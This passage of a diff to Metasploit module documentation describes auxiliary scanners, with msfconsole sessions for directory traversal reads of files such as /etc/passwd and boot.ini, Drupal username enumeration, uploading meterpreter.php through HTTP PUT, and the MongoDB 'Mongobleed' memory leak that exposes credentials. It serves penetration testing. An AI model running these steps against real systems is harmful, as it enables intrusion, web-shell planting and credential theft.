+1. Download BisonWare BisonFTP Server 3.5 from [Exploit-DB (EDB-38341)](https://www.exploit-db.com/exploits/38341).
+2. Install and run it on a Windows host.
+3. Configure the FTP root directory and ensure the service is listening (default port 21).
+4. Set up an anonymous login or create a user account with credentials.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/ftp/bison_ftp_traversal`
+3. Do: `set RHOSTS [target IP]`
+4. Do: `run`
+5. You should see the requested file contents stored as loot.
+
+## Options
+
+### DEPTH
+
+The number of traversal sequences (`..//`) to prepend to the file path. The default is `32`.
+A high value is used because the exact depth of the FTP root can vary.
+
+### PATH
+
+The path to the file to retrieve from the target, relative to the drive root. The default value
+is `boot.ini`. For example, to read the Windows hosts file, set this to
+`windows/system32/drivers/etc/hosts`.
+
+### FTPUSER
+
+The FTP username to authenticate with. Default is `anonymous`.
+
+### FTPPASS
+
+The FTP password to authenticate with. Default is `mozilla@example.com`.
+
+## Scenarios
+
+### BisonFTP 3.5 on Windows XP
+
+```
+msf > use auxiliary/scanner/ftp/bison_ftp_traversal
+msf auxiliary(scanner/ftp/bison_ftp_traversal) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf auxiliary(scanner/ftp/bison_ftp_traversal) > set PATH boot.ini
+PATH => boot.ini
+msf auxiliary(scanner/ftp/bison_ftp_traversal) > run
+
+[+] Stored boot.ini to /root/.msf4/loot/20250319120000_default_192.168.1.10_bisonware.ftp.da_123456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Reading the hosts file
+
+```
+msf > use auxiliary/scanner/ftp/bison_ftp_traversal
+msf auxiliary(scanner/ftp/bison_ftp_traversal) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf auxiliary(scanner/ftp/bison_ftp_traversal) > set PATH windows/system32/drivers/etc/hosts
+PATH => windows/system32/drivers/etc/hosts
+msf auxiliary(scanner/ftp/bison_ftp_traversal) > set VERBOSE true
+VERBOSE => true
+msf auxiliary(scanner/ftp/bison_ftp_traversal) > run
+
+[*] Data returned:
+# Copyright (c) 1993-2009 Microsoft Corp.
+#
+# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
+
+[+] Stored windows/system32/drivers/etc/hosts to /root/.msf4/loot/20250319120000_default_192.168.1.10_bisonware.ftp.da_654321.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/scanner/ftp/ftp_anonymous.md

@@ -52,7 +52,7 @@ This module allows us to scan through a series of IP Addresses and provide detai
 
 ## Verification Steps
 
-1. Do: ```use auxiliary/scanner/ftp/anonymous```
+1. Do: ```use auxiliary/scanner/ftp/ftp_anonymous```
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set RPORT [IP]```
 4. Do: ```run```
@@ -62,17 +62,17 @@ This module allows us to scan through a series of IP Addresses and provide detai
 ### vsFTPd 3.0.3 on Kali
 
 ```
-msf > use auxiliary/scanner/ftp/anonymous
-msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
+msf > use auxiliary/scanner/ftp/ftp_anonymous
+msf auxiliary(ftp_anonymous) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
-msf auxiliary(anonymous) > set RPORT 21
+msf auxiliary(ftp_anonymous) > set RPORT 21
 RPORT => 21
-msf auxiliary(anonymous) > exploit
+msf auxiliary(ftp_anonymous) > exploit
 
 [+] 127.0.0.1:21          - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf auxiliary(anonymous) > 
+msf auxiliary(ftp_anonymous) >
 ```
 
 ## Confirming using NMAP

documentation/modules/auxiliary/scanner/http/apache_activemq_traversal.md

@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on
+Windows systems. The flaw exists in the Jetty ResourceHandler that ships with these versions,
+allowing an unauthenticated attacker to read arbitrary files from the target host.
+
+The vulnerability is tracked as [CVE-2010-1587](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1587).
+
+### Setup
+
+To test this module you need a Windows host running one of the affected versions:
+
+1. Download [Apache ActiveMQ 5.3.1](http://archive.apache.org/dist/activemq/apache-activemq/5.3.1/) or 5.3.2.
+2. Extract the archive and run `bin\activemq.bat` to start the broker.
+3. The web console listens on port **8161** by default.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/http/apache_activemq_traversal`
+3. Do: `set RHOSTS [target IP]`
+4. Do: `set RPORT 8161`
+5. Do: `run`
+6. You should see the contents of the requested file saved as loot.
+
+## Options
+
+### FILEPATH
+
+The path of the file to retrieve from the target system, relative to the drive root. The default
+value is `/windows\\win.ini`. Backslashes must be used for path separators on Windows targets.
+
+### DEPTH
+
+The number of traversal sequences (`/\..`) to prepend to the request. The default is `4`. If the
+file is not found, try increasing this value.
+
+## Scenarios
+
+### ActiveMQ 5.3.1 on Windows Server 2003 SP2
+
+```
+msf > use auxiliary/scanner/http/apache_activemq_traversal
+msf auxiliary(scanner/http/apache_activemq_traversal) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf auxiliary(scanner/http/apache_activemq_traversal) > set RPORT 8161
+RPORT => 8161
+msf auxiliary(scanner/http/apache_activemq_traversal) > run
+
+[*] 192.168.1.100:8161 - Sending request...
+[*] 192.168.1.100:8161 - File saved in: /root/.msf4/loot/20250319120000_default_192.168.1.100_apache.activemq_123456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/scanner/http/coldfusion_version.md

@@ -0,0 +1,57 @@
+## Vulnerable Application
+
+This module attempts to identify Adobe ColdFusion installations and determine the version
+running on the target. It inspects the ColdFusion Administrator login page at
+`/CFIDE/administrator/index.cfm` and fingerprints the version based on meta tags, copyright
+strings, and other patterns in the HTML response. The module can detect ColdFusion MX6, MX7,
+8, 9, and 10, as well as identify the underlying operating system from the `Server` header.
+
+### Setup
+
+Install any version of Adobe ColdFusion up to version 10. The default installation should
+have the administrator page accessible at `/CFIDE/administrator/index.cfm`. No additional
+configuration is needed.
+
+Alternatively, older ColdFusion trial installers can often be found on the
+[Adobe archive](https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html).
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/http/coldfusion_version`
+3. Do: `set RHOSTS [target IP]`
+4. Do: `run`
+5. You should see the detected ColdFusion version and OS printed to the console.
+
+## Options
+
+## Scenarios
+
+### ColdFusion 9 on Windows Server 2008
+
+```
+msf > use auxiliary/scanner/http/coldfusion_version
+msf auxiliary(scanner/http/coldfusion_version) > set RHOSTS 10.0.0.20
+RHOSTS => 10.0.0.20
+msf auxiliary(scanner/http/coldfusion_version) > set THREADS 5
+THREADS => 5
+msf auxiliary(scanner/http/coldfusion_version) > run
+
+[+] 10.0.0.20: Adobe ColdFusion 9 (administrator access) (Windows (Microsoft-IIS/7.5))
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ColdFusion 8 on Linux
+
+```
+msf > use auxiliary/scanner/http/coldfusion_version
+msf auxiliary(scanner/http/coldfusion_version) > set RHOSTS 10.0.0.30
+RHOSTS => 10.0.0.30
+msf auxiliary(scanner/http/coldfusion_version) > run
+
+[+] 10.0.0.30: Adobe ColdFusion 8 (administrator access) (Unix (Apache/2.2.22))
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/scanner/http/drupal_views_user_enum.md

@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+This module exploits an information disclosure vulnerability in the
+[Views](https://www.drupal.org/project/views) module for Drupal 6. When the Views module
+version 6.x-2.11 or earlier is installed, the autocomplete callback for user fields is
+accessible without proper authorization. The module brute-forces the first 10 usernames by
+iterating through the letters `a` to `z`.
+
+Drupal does not consider disclosure of usernames to be a security weakness on its own, but
+enumerated usernames can be useful for password-guessing attacks.
+
+### Setup
+
+1. Install Drupal 6 with the Views module version 6.x-2.11 or earlier.
+2. Create several user accounts so there is data to enumerate.
+3. Ensure the Views module is enabled under **Administer > Site building > Modules**.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/http/drupal_views_user_enum`
+3. Do: `set RHOSTS [target IP]`
+4. Do: `run`
+5. You should see a list of discovered usernames printed to the console.
+
+## Options
+
+### TARGETURI
+
+The base path to the Drupal installation. The default value is `/`. Change this if Drupal is
+installed in a subdirectory, for example `/drupal/`.
+
+## Scenarios
+
+### Drupal 6.x with Views 6.x-2.11
+
+```
+msf > use auxiliary/scanner/http/drupal_views_user_enum
+msf auxiliary(scanner/http/drupal_views_user_enum) > set RHOSTS 192.168.1.50
+RHOSTS => 192.168.1.50
+msf auxiliary(scanner/http/drupal_views_user_enum) > set TARGETURI /
+TARGETURI => /
+msf auxiliary(scanner/http/drupal_views_user_enum) > run
+
+[*] Begin enumerating users at 192.168.1.50
+[+] Found User: admin
+[+] Found User: john
+[+] Found User: testuser
+[*] Done. 3 usernames found...
+[*] Usernames stored in: /root/.msf4/loot/20250319120000_default_192.168.1.50_drupal_user_123456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/scanner/http/elasticsearch_traversal.md

@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability in ElasticSearch versions prior to
+1.6.1. The flaw exists in the Snapshot API and allows an unauthenticated attacker to read
+arbitrary files from the target system with the privileges of the JVM process.
+
+The vulnerability is tracked as [CVE-2015-5531](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531).
+
+### Setup
+
+1. Install a vulnerable version of ElasticSearch (prior to 1.6.1). Older releases are available
+   from the [ElasticSearch downloads archive](https://www.elastic.co/downloads/past-releases).
+2. Configure a `path.repo` in `elasticsearch.yml` so that the Snapshot API is available:
+   ```
+   path.repo: ["/tmp/backups"]
+   ```
+3. Start ElasticSearch. It listens on port **9200** by default.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/http/elasticsearch_traversal`
+3. Do: `set RHOSTS [target IP]`
+4. Do: `run`
+5. You should see the requested file contents saved as loot.
+
+## Options
+
+### FILEPATH
+
+The path to the file to read on the target. The default value is `/etc/passwd`.
+
+### DEPTH
+
+The number of `../` traversal sequences to include. The default is `7`. Increase this if the
+file cannot be reached with the default depth.
+
+## Scenarios
+
+### ElasticSearch 1.5.2 on Ubuntu 14.04
+
+```
+msf > use auxiliary/scanner/http/elasticsearch_traversal
+msf auxiliary(scanner/http/elasticsearch_traversal) > set RHOSTS 10.10.10.50
+RHOSTS => 10.10.10.50
+msf auxiliary(scanner/http/elasticsearch_traversal) > set RPORT 9200
+RPORT => 9200
+msf auxiliary(scanner/http/elasticsearch_traversal) > run
+
+[*] The target appears to be vulnerable.
+[+] File saved in: /root/.msf4/loot/20250319120000_default_10.10.10.50_elasticsearch.tr_123456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/scanner/http/http_put.md

@@ -1,44 +1,63 @@
-## Description 
-This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
+## Vulnerable Application
+
+This module targets web servers that allow HTTP PUT and DELETE methods without proper restrictions.
+
+Improper configuration of HTTP PUT can allow attackers to upload arbitrary files to the server.
+If executable files are uploaded, this may lead to:
+
+- Arbitrary file upload
+- Remote code execution
+- Website defacement
+- Unauthorized content modification
+
+DELETE method misuse can allow attackers to remove existing files from the server.
+
+To test this module:
+
+1. Set up a web server (Apache, Nginx, IIS, etc.)
+2. Ensure HTTP PUT/DELETE methods are enabled
+3. Confirm lack of authentication or access control
 
 ## Verification Steps
 
-1. Do: ```use auxiliary/scanner/http/http_put```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set RPORT [PORT]```
-4. Do: ```set PATH [PATH]```
-5. Do: ```set FILENAME [FILENAME]```
-6. Do: ```set FILEDATA [PATH]```
-7. Do: ```run```
+1. Start Metasploit: `msfconsole`
+2. Load the module: `use auxiliary/scanner/http/http_put`
+3. Set options:
+   - `set RHOSTS [IP]`
+   - `set RPORT [PORT]`
+   - `set PATH [PATH]`
+   - `set FILENAME [FILENAME]`
+   - `set FILEDATA [PATH]`
+4. Run: `run`
+
+If vulnerable, the module will confirm successful upload or deletion.
 
 ## Options
 
 ### ACTION
 
-Set `ACTION` to either `PUT` or `DELETE`. (Default: `PUT`)
+Set `ACTION` to either `PUT` or `DELETE`. Default is `PUT`.
 
 ### PUT
 
-Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.
+Uploads files to the server. If `FILENAME` is not specified, a random `.txt` file is generated.
 
-### DELETE 
+### DELETE
 
-Deletes the file specified in the `FILENAME` option (Default: `msf_http_put_test.txt`). `FILENAME` is required when Action is set to DELETE. 
+Deletes the file specified in `FILENAME`.
 
 ### PATH
 
-The path at which this module will attempt to either PUT the content or DELETE it.
+Target path for upload or deletion.
 
 ### FILEDATA
 
-The content to put in the uploaded file when `ACTION` is set to `PUT`.
-
+Content to upload when using PUT.
 
 ## Scenarios
 
-Here `ACTION` is by default set to `PUT`.
-
-```
+Example usage with `ACTION` set to `PUT` (default):
+```bash
 msf > use auxiliary/scanner/http/http_put
 msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
 RHOSTS => 1.1.1.23
@@ -48,13 +67,11 @@ msf auxiliary(scanner/http/http_put) > set PATH /uploads
 PATH => /uploads
 msf auxiliary(scanner/http/http_put) > set FILENAME meterpreter.php
 FILENAME => meterpreter.php
-msf auxiliary(scanner/http/http_put) > set FILEDATA file://root/Desktop/meterpreter.php
-FILEDATA => file://root/Desktop/meterpreter.php
-msf auxiliary(scanner/http/http_put) > run 
-
+msf auxiliary(scanner/http/http_put) > set FILEDATA file:/root/Desktop/meterpreter.php
+FILEDATA => file:/root/Desktop/meterpreter.php
+msf auxiliary(scanner/http/http_put) > run
 [+] File uploaded: http://1.1.1.23:8585/uploads/meterpreter.php
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/http_put) >
 ```
- 

documentation/modules/auxiliary/scanner/http/wordpress_pingback_access.md

@@ -0,0 +1,44 @@
+## Vulnerable Application
+
+This module checks for accessible WordPress pingback functionality.
+
+Pingback is an XML-RPC feature in WordPress that allows blogs to notify each other of references.
+If enabled, it can be abused for:
+
+- DDoS amplification attacks
+- Internal network scanning
+- Information disclosure
+
+To test this module:
+
+1. Set up a WordPress instance (any version with XML-RPC enabled)
+2. Ensure `/xmlrpc.php` is accessible
+3. Pingback functionality should not be disabled
+
+## Verification Steps
+
+1. Start Metasploit: `msfconsole`
+2. Load the module: `use auxiliary/scanner/http/wordpress_pingback_access`
+3. Set the target: `set RHOSTS example.com`
+4. Run the module: `run`
+
+If vulnerable, the module will indicate that pingback access is enabled.
+
+## Options
+
+This module has no additional options beyond the standard ones.
+
+## Scenarios
+
+Example usage against a WordPress site with pingback enabled:
+```bash
+msf > use auxiliary/scanner/http/wordpress_pingback_access
+msf auxiliary(scanner/http/wordpress_pingback_access) > set RHOSTS example.com
+RHOSTS => example.com
+msf auxiliary(scanner/http/wordpress_pingback_access) > run
+[*] Checking pingback access on example.com
+[+] Pingback is enabled and accessible at /xmlrpc.php
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/wordpress_pingback_access) >
+```

documentation/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.md

@@ -1,8 +1,11 @@
 ## Vulnerable Application
 
-This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to as "Mongobleed."
+This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to
+as "Mongobleed."
 
-By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
+By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed
+uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the
+decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
 
 The vulnerability allows unauthenticated remote attackers to leak server memory which may contain sensitive information such as:
 - Database credentials
@@ -11,7 +14,8 @@ The vulnerability allows unauthenticated remote attackers to leak server memory
 - Connection strings
 - Application data
 
-**Note:** This vulnerability only affects servers with zlib compression enabled. The module will check for zlib compression support before attempting exploitation.
+This vulnerability only affects servers with zlib compression enabled. The module checks for zlib compression support before attempting
+exploitation.
 
 ### Vulnerable Versions
 
@@ -39,44 +43,14 @@ Per [MongoDB JIRA SERVER-115508](https://jira.mongodb.org/browse/SERVER-115508):
 ## Verification Steps
 
 1. Install a vulnerable MongoDB version (e.g., MongoDB 7.0.15)
-2. Start the MongoDB service
+2. Start the MongoDB service with zlib compression enabled
 3. Start msfconsole
 4. `use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed`
 5. `set RHOSTS <target>`
-6. `set ACTION CHECK` then `run` (optional - quick vulnerability check)
-7. `set ACTION SCAN` then `run` (full exploitation)
+6. `check` to verify the target is vulnerable
+7. `run` to perform the full memory leak scan
 8. Verify that memory contents are leaked and saved to loot
 
-## Actions
-
-The module supports two actions:
-
-### SCAN (Default)
-Full exploitation that scans memory offsets and extracts leaked data.
-
-### CHECK
-Quick vulnerability check using the Wiz Research "magic packet" technique for deterministic vulnerability detection. This action:
-
-1. Checks the MongoDB version against known vulnerable versions
-2. Verifies that zlib compression is enabled on the server
-3. Sends a specially crafted packet that triggers the memory leak
-4. Analyzes the response for BSON signatures in leaked memory
-
-This provides a quick, low-impact way to confirm vulnerability without performing a full memory scan.
-
-```
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
-ACTION => CHECK
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
-
-[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
-[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
-[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
-[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
-```
-
 ## Options
 
 ### MIN_OFFSET
@@ -95,13 +69,15 @@ Padding added to the claimed uncompressed buffer size. Default: `500`
 Minimum bytes to report as an interesting leak in the output. Default: `10`
 
 ### QUICK_SCAN
-Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may miss some leaks. Default: `false`
+Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may
+miss some leaks. Default: `false`
 
 ### REPEAT
 Number of scan passes to perform. Memory contents change over time, so multiple passes can capture more data. Default: `1`
 
 ### REUSE_CONNECTION
-Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each probe. This can improve scanning speed by 10-50x. Default: `true`
+Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each
+probe. This can improve scanning speed by 10-50x. Default: `true`
 
 ## Advanced Options
 
@@ -124,29 +100,38 @@ Show progress every N offsets. Set to 0 to disable. Default: `500`
 Save all raw MongoDB responses to a separate loot file for offline analysis with tools like `strings`, `binwalk`, etc. Default: `false`
 
 ### SAVE_JSON
-Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful for automated processing or integration with other tools. Default: `true`
+Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful
+for automated processing or integration with other tools. Default: `true`
 
 ## Scenarios
 
-### Using the CHECK Action
+### Vulnerability Check
+
+The module supports the standard `check` command. It fingerprints the MongoDB version, verifies zlib compression is enabled, and sends
+a crafted magic packet to confirm exploitability.
 
 ```
 msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
 RHOSTS => 192.168.1.100
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
-ACTION => CHECK
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
 
-[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
-[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
-[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
-[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
+[+] 192.168.1.100:27017 - The target is vulnerable. Server leaks memory via crafted OP_COMPRESSED message (MongoDB 4.4.26)
 ```
 
-### MongoDB 7.0.14 on Linux (with Connection Reuse)
+When pointed at a non-MongoDB service, the check correctly identifies it as not vulnerable:
+
+```
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.200
+RHOSTS => 192.168.1.200
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RPORT 80
+RPORT => 80
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
+
+[-] 192.168.1.200:80 - The target is not exploitable. Target does not appear to be a MongoDB service
+```
+
+### MongoDB 4.4.26 on Windows
 
 ```
 msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
@@ -154,26 +139,25 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1
 RHOSTS => 192.168.1.100
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
-[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - Server compressors: zlib
 [*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
 [*] 192.168.1.100:27017 - Scanning 8173 offsets (20-8192, step=1)
-[+] 192.168.1.100:27017 - offset=20   len=82  : [conn38248] end connection 10.0.0.5:36845 (0 connections now open)
-[+] 192.168.1.100:27017 - offset=163  len=617 : driver: { name: "mongoc / ext-mongodb:PHP ", version: "1.24.3" }
-[+] 192.168.1.100:27017 - offset=501  len=40  : id bson type in element with field name
-[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 7 leaks found - ETA: 49s
+[+] 192.168.1.100:27017 - offset=77   len=39  : conn38248] end connection 10.0.0.5:36845
+[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 3 leaks found - ETA: 49s
 [+] 192.168.1.100:27017 - offset=757  len=12  : password=abc
-[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password' in context: ...config: { password=abc123&user=admin...
-[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 42s
+[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password'
+[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 5 leaks found - ETA: 42s
 ...
 
 [!] 192.168.1.100:27017 - Potential secrets detected:
-[!] 192.168.1.100:27017 -   - Pattern 'password' at offset 757 (pos 12): ...config: { password=abc123&user=admin...
+[!] 192.168.1.100:27017 -   - Pattern 'password' at offset 757
 
-[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
-[+] 192.168.1.100:27017 - Unique fragments: 13
+[+] 192.168.1.100:27017 - Total leaked: 703 bytes
+[+] 192.168.1.100:27017 - Unique fragments: 8
 [+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
+[+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
 [*] 192.168.1.100:27017 - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
@@ -182,12 +166,15 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
 ```
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
+REPEAT => 3
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set MAX_OFFSET 16384
+MAX_OFFSET => 16384
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
 [*] 192.168.1.100:27017 - Server compressors: zlib
 [*] 192.168.1.100:27017 - Running 3 scan passes to maximize data collection...
 [*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
@@ -211,15 +198,16 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
 ```
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
+QUICK_SCAN => true
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
 [*] 192.168.1.100:27017 - Server compressors: zlib
 [*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
 [*] 192.168.1.100:27017 - Scanning 97 offsets (20-8192, step=1, quick mode)
-[+] 192.168.1.100:27017 - offset=20   len=45  : connection string fragment...
 [+] 192.168.1.100:27017 - offset=128  len=23  : mongodb://admin:pass...
 
 [+] 192.168.1.100:27017 - Total leaked: 234 bytes
@@ -228,33 +216,52 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 [+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
 ```
 
+### Server Without zlib Compression
+
+```
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check rhost=192.168.123.144
+
+[*] 192.168.123.144:27017 - The target is not exploitable. Server does not have zlib compression enabled (MongoDB 4.4.26)
+
+msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run rhost=192.168.123.144
+
+[*] 192.168.123.144:27017 - MongoDB version: 4.4.26
+[+] 192.168.123.144:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
+[*] 192.168.123.144:27017 - Server compressors: none
+[-] 192.168.123.144:27017 - Server does not support zlib compression - vulnerability not exploitable
+[*] 192.168.123.144:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
+[*] 192.168.123.144:27017 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
 ### JSON Report Output
 
-The JSON report includes full metadata for each leak:
+When `SAVE_JSON` is enabled (the default), the module saves a structured JSON report alongside the raw loot. This includes full
+metadata for each leak fragment:
 
 ```json
 {
   "scan_info": {
     "target": "192.168.1.100",
     "port": 27017,
-    "mongodb_version": "7.0.14",
+    "mongodb_version": "4.4.26",
     "scan_time": "2025-12-30T14:30:00Z",
     "cve": "CVE-2025-14847"
   },
   "summary": {
-    "total_leaks": 13,
-    "total_bytes": 1703,
-    "secrets_found": 2
+    "total_leaks": 8,
+    "total_bytes": 703,
+    "secrets_found": 1
   },
   "secrets": [
     "Pattern 'password' at offset 757..."
   ],
   "leaks": [
     {
-      "offset": 20,
-      "length": 82,
-      "data_base64": "W2Nvbm4zODI0OF0gZW5kIGNvbm5lY3Rpb24...",
-      "data_printable": "[conn38248] end connection 10.0.0.5:36845...",
+      "offset": 77,
+      "length": 39,
+      "data_base64": "Y29ubjM4MjQ4XSBlbmQgY29ubmVjdGlvbi4uLg==",
+      "data_printable": "conn38248] end connection 10.0.0.5:36845",
       "has_secret": false,
       "timestamp": "2025-12-30T14:30:01Z"
     }
@@ -262,8 +269,9 @@ The JSON report includes full metadata for each leak:
 }
 ```
 
-You can process the JSON with standard tools:
-```bash
+The JSON report can be processed with standard tools:
+
+```
 # Extract all leaked data
 cat mongobleed.json | jq -r '.leaks[].data_printable'
 
@@ -278,43 +286,33 @@ cat mongobleed.json | jq '.summary'
 
 ```
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
